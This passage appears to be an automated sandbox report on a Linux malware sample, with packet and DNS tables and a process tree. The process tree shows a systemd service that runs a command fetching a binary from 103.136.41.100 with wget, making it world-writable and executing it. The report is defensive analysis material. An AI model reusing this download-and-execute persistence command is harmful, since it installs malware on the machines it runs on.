Jan 11, 2025 06:18:15.471062899 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.471076965 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.471899033 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.471915007 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.471929073 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.472717047 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.472732067 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.472744942 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.473551035 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.473566055 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.473578930 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.474461079 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.474474907 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.474488020 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.475240946 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.475255966 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.475267887 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.476100922 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.476129055 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.476142883 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.476859093 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.476882935 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.476900101 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.477744102 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.477761030 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.477775097 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.478596926 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.478614092 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.478627920 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.479816914 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.479835033 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.480145931 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.483700037 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.585272074 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.595915079 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.595979929 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:19.539427996 CET | 56441 | 53 | 192.168.2.13 | 1.1.1.1 |
Jan 11, 2025 06:18:19.549812078 CET | 53 | 56441 | 1.1.1.1 | 192.168.2.13 |
Jan 11, 2025 06:18:19.549881935 CET | 56441 | 53 | 192.168.2.13 | 1.1.1.1 |
Jan 11, 2025 06:18:19.549942017 CET | 56441 | 53 | 192.168.2.13 | 1.1.1.1 |
Jan 11, 2025 06:18:19.565733910 CET | 53 | 56441 | 1.1.1.1 | 192.168.2.13 |
Jan 11, 2025 06:18:19.565783024 CET | 56441 | 53 | 192.168.2.13 | 1.1.1.1 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 11, 2025 06:20:42.783869982 CET | 41885 | 53 | 192.168.2.13 | 1.1.1.1 |
Jan 11, 2025 06:20:42.783936024 CET | 38499 | 53 | 192.168.2.13 | 1.1.1.1 |
Jan 11, 2025 06:20:42.792577982 CET | 53 | 41885 | 1.1.1.1 | 192.168.2.13 |
Jan 11, 2025 06:20:42.792594910 CET | 53 | 38499 | 1.1.1.1 | 192.168.2.13 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 11, 2025 06:20:42.783869982 CET | 192.168.2.13 | 1.1.1.1 | 0x923c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 11, 2025 06:20:42.783936024 CET | 192.168.2.13 | 1.1.1.1 | 0xeedb | Standard query (0) | 28 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 11, 2025 06:20:42.792577982 CET | 1.1.1.1 | 192.168.2.13 | 0x923c | No error (0) | 162.213.35.25 | A (IP address) | IN (0x0001) | false | ||
Jan 11, 2025 06:20:42.792577982 CET | 1.1.1.1 | 192.168.2.13 | 0x923c | No error (0) | 162.213.35.24 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port |
---|---|---|---|---|
0 | 192.168.2.13 | 50808 | 103.136.41.100 | 80 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jan 11, 2025 06:18:14.676928043 CET | 154 | OUT | |
Jan 11, 2025 06:18:15.289175034 CET | 711 | IN | |
Jan 11, 2025 06:18:15.289251089 CET | 1236 | IN | |
Jan 11, 2025 06:18:15.289290905 CET | 1236 | IN | |
Jan 11, 2025 06:18:15.289328098 CET | 484 | IN | |
Jan 11, 2025 06:18:15.289364100 CET | 1236 | IN | |
Jan 11, 2025 06:18:15.289402962 CET | 1236 | IN | |
Jan 11, 2025 06:18:15.289438009 CET | 1236 | IN | |
Jan 11, 2025 06:18:15.289475918 CET | 1236 | IN | |
Jan 11, 2025 06:18:15.289510012 CET | 388 | IN | |
Jan 11, 2025 06:18:15.289549112 CET | 1236 | IN | |
Jan 11, 2025 06:18:15.298974037 CET | 1236 | IN |
System Behavior
Start time (UTC): | 05:17:57 |
Start date (UTC): | 11/01/2025 |
Path: | /tmp/5.elf |
Arguments: | /tmp/5.elf |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 05:18:03 |
Start date (UTC): | 11/01/2025 |
Path: | /tmp/5.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 05:18:03 |
Start date (UTC): | 11/01/2025 |
Path: | /bin/sh |
Arguments: | sh -c "systemctl daemon-reload > /dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 05:18:03 |
Start date (UTC): | 11/01/2025 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 05:18:03 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/bin/systemctl |
Arguments: | systemctl daemon-reload |
File size: | 996584 bytes |
MD5 hash: | 4deddfb6741481f68aeac522cc26ff4b |
Start time (UTC): | 05:18:03 |
Start date (UTC): | 11/01/2025 |
Path: | /tmp/5.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 05:18:03 |
Start date (UTC): | 11/01/2025 |
Path: | /bin/sh |
Arguments: | sh -c "systemctl start hello.service > /dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 05:18:03 |
Start date (UTC): | 11/01/2025 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 05:18:03 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/bin/systemctl |
Arguments: | systemctl start hello.service |
File size: | 996584 bytes |
MD5 hash: | 4deddfb6741481f68aeac522cc26ff4b |
Start time (UTC): | 05:17:59 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/bin/xfce4-panel |
Arguments: | - |
File size: | 375768 bytes |
MD5 hash: | a15b657c7d54ac1385f1f15004ea6784 |
Start time (UTC): | 05:17:59 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 |
Arguments: | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear" |
File size: | 35136 bytes |
MD5 hash: | ac0b8a906f359a8ae102244738682e76 |
Start time (UTC): | 05:17:59 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/bin/xfce4-panel |
Arguments: | - |
File size: | 375768 bytes |
MD5 hash: | a15b657c7d54ac1385f1f15004ea6784 |
Start time (UTC): | 05:17:59 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 |
Arguments: | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)" |
File size: | 35136 bytes |
MD5 hash: | ac0b8a906f359a8ae102244738682e76 |
Start time (UTC): | 05:17:59 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/bin/xfce4-panel |
Arguments: | - |
File size: | 375768 bytes |
MD5 hash: | a15b657c7d54ac1385f1f15004ea6784 |
Start time (UTC): | 05:17:59 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 |
Arguments: | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system" |
File size: | 35136 bytes |
MD5 hash: | ac0b8a906f359a8ae102244738682e76 |
Start time (UTC): | 05:17:59 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/bin/xfce4-panel |
Arguments: | - |
File size: | 375768 bytes |
MD5 hash: | a15b657c7d54ac1385f1f15004ea6784 |
Start time (UTC): | 05:17:59 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 |
Arguments: | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display" |
File size: | 35136 bytes |
MD5 hash: | ac0b8a906f359a8ae102244738682e76 |
Start time (UTC): | 05:17:59 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/bin/xfce4-panel |
Arguments: | - |
File size: | 375768 bytes |
MD5 hash: | a15b657c7d54ac1385f1f15004ea6784 |
Start time (UTC): | 05:17:59 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 |
Arguments: | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel" |
File size: | 35136 bytes |
MD5 hash: | ac0b8a906f359a8ae102244738682e76 |
Start time (UTC): | 05:18:00 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/bin/xfce4-panel |
Arguments: | - |
File size: | 375768 bytes |
MD5 hash: | a15b657c7d54ac1385f1f15004ea6784 |
Start time (UTC): | 05:18:00 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 |
Arguments: | /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions" |
File size: | 35136 bytes |
MD5 hash: | ac0b8a906f359a8ae102244738682e76 |
Start time (UTC): | 05:18:03 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/lib/systemd/systemd |
Arguments: | - |
File size: | 1620224 bytes |
MD5 hash: | 9b2bec7092a40488108543f9334aab75 |
Start time (UTC): | 05:18:03 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
Arguments: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File size: | 22760 bytes |
MD5 hash: | 3633b075f40283ec938a2a6a89671b0e |
Start time (UTC): | 05:18:04 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/lib/systemd/systemd |
Arguments: | - |
File size: | 1620224 bytes |
MD5 hash: | 9b2bec7092a40488108543f9334aab75 |
Start time (UTC): | 05:18:04 |
Start date (UTC): | 11/01/2025 |
Path: | /bin/bash |
Arguments: | /bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;" |
File size: | 1183448 bytes |
MD5 hash: | 7063c3930affe123baecd3b340f1ad2c |
Start time (UTC): | 05:18:04 |
Start date (UTC): | 11/01/2025 |
Path: | /bin/bash |
Arguments: | - |
File size: | 1183448 bytes |
MD5 hash: | 7063c3930affe123baecd3b340f1ad2c |
Start time (UTC): | 05:18:04 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/bin/sleep |
Arguments: | sleep 10 |
File size: | 39256 bytes |
MD5 hash: | fcba58db24e5e3672c4d70a3bb01d7a4 |
Start time (UTC): | 05:18:14 |
Start date (UTC): | 11/01/2025 |
Path: | /bin/bash |
Arguments: | - |
File size: | 1183448 bytes |
MD5 hash: | 7063c3930affe123baecd3b340f1ad2c |
Start time (UTC): | 05:18:14 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/bin/rm |
Arguments: | rm -rf /tmp/5 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
Start time (UTC): | 05:18:14 |
Start date (UTC): | 11/01/2025 |
Path: | /bin/bash |
Arguments: | - |
File size: | 1183448 bytes |
MD5 hash: | 7063c3930affe123baecd3b340f1ad2c |
Start time (UTC): | 05:18:14 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/bin/wget |
Arguments: | wget http://103.136.41.100/5 -O /tmp/5 |
File size: | 548568 bytes |
MD5 hash: | 996940118df7bb2aaa718589d4e95c08 |
Start time (UTC): | 05:18:15 |
Start date (UTC): | 11/01/2025 |
Path: | /bin/bash |
Arguments: | - |
File size: | 1183448 bytes |
MD5 hash: | 7063c3930affe123baecd3b340f1ad2c |
Start time (UTC): | 05:18:15 |
Start date (UTC): | 11/01/2025 |
Path: | /usr/bin/chmod |
Arguments: | chmod 777 /tmp/5 |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 05:18:15 |
Start date (UTC): | 11/01/2025 |
Path: | /bin/bash |
Arguments: | - |
File size: | 1183448 bytes |
MD5 hash: | 7063c3930affe123baecd3b340f1ad2c |
Start time (UTC): | 05:18:15 |
Start date (UTC): | 11/01/2025 |
Path: | /tmp/5 |
Arguments: | /tmp/5 .p1 |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |